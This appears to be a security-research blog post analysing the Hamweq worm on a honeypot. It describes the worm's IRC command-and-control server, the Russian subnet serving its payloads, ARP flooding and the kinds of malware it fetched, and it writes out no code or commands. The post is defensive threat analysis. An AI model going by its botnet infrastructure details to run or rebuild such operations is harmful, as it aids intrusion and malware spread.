Skip to content

Hamweq Worm Brings a Mountain of Malware

2013-01-15

20130115_hamweq_think-with-your-dipstick-jimmyFor an early Christmas present, the Internet gave our ThreatVision research team a worm malware called Hamweq. It’s the kind of unsubtle “gift” that keeps on giving, though most other people wouldn’t appreciate its prolific malicious activity.

The Hamweq malware, which had copied itself onto one of our UK-based research honeypots in mid-December, uses an IRC server in China to receive command-and-control instructions, and behaves as a typical botnet client. As a worm, it also attempts to exploit vulnerabilities in Windows computers in order to propagate; this appears to be how it ended up on the honeypot in the first place.

Our sample continues to actively retrieve new malware payloads from a variety of Web hosts located around the world, and periodically engages in a wide range of undesirable activities, including scanning for other vulnerable hosts and ARP poisoning. It was also pretty damn rude — the dialog box above is what you’d see about 30 seconds after the infection took hold.

20130115_hamweq_irc_download_command_crop

Initally, the worm performs a geolocation query of the infected machine’s IP address using a free service. When it receives a result, it joins the malicious IRC server at n.janalot.com, and incorporates the two-letter country code of the infected machine into the bot’s IRC “nickname.” When it joins a particular channel on the server, the bot receives a private IRC message with simple commands (shown above) to retrieve and execute malware.

20130115_hamweq_payloads_crop

This Hamweq sample is a prolific downloader. Its payloads are a hot mess of spam relayers, keyloggers, brute-force scanning tools, droppers, and multiple RATs. During a 16-minute period on a single testbed, the malware (or its payloads) downloaded 20 malicious applications, 15 of which were unique.

20130115_hamweq_geolocation-of-payloads_crop

The samples originate from a variety of IP addresses in Russia, all on the 146.185.246.x subnet; The IP range is controlled by a company called cheaphosts.ru. While it seems like this might just be a case where the malware distributors are abusing a legitimate business, it’s certainly questionable that the cheaphosts.ru domain was only created on December 12th last year, less than a week before we first saw the worm.

In fact, the worm (or one of its payloads) was so enthusiastic about its work that it, literally, knocked the network on which the testbed was hosted offline temporarily by spamming network ARP requests. We had to power-cycle the router to get it to respond to normal network requests, again.

While many of the payloads were unknown to antivirus vendors at the time they initially came down the pipe to the infected testbed, within a matter of hours AV detection rates (as unscientifically measured by counting detections on Virustotal) had climbed from just a handful to nearly all of the companies represented on that service.

In my next post, I’ll discuss the behavior of these various malware payloads, and how to detect them.

Comments are closed.

%d bloggers like this: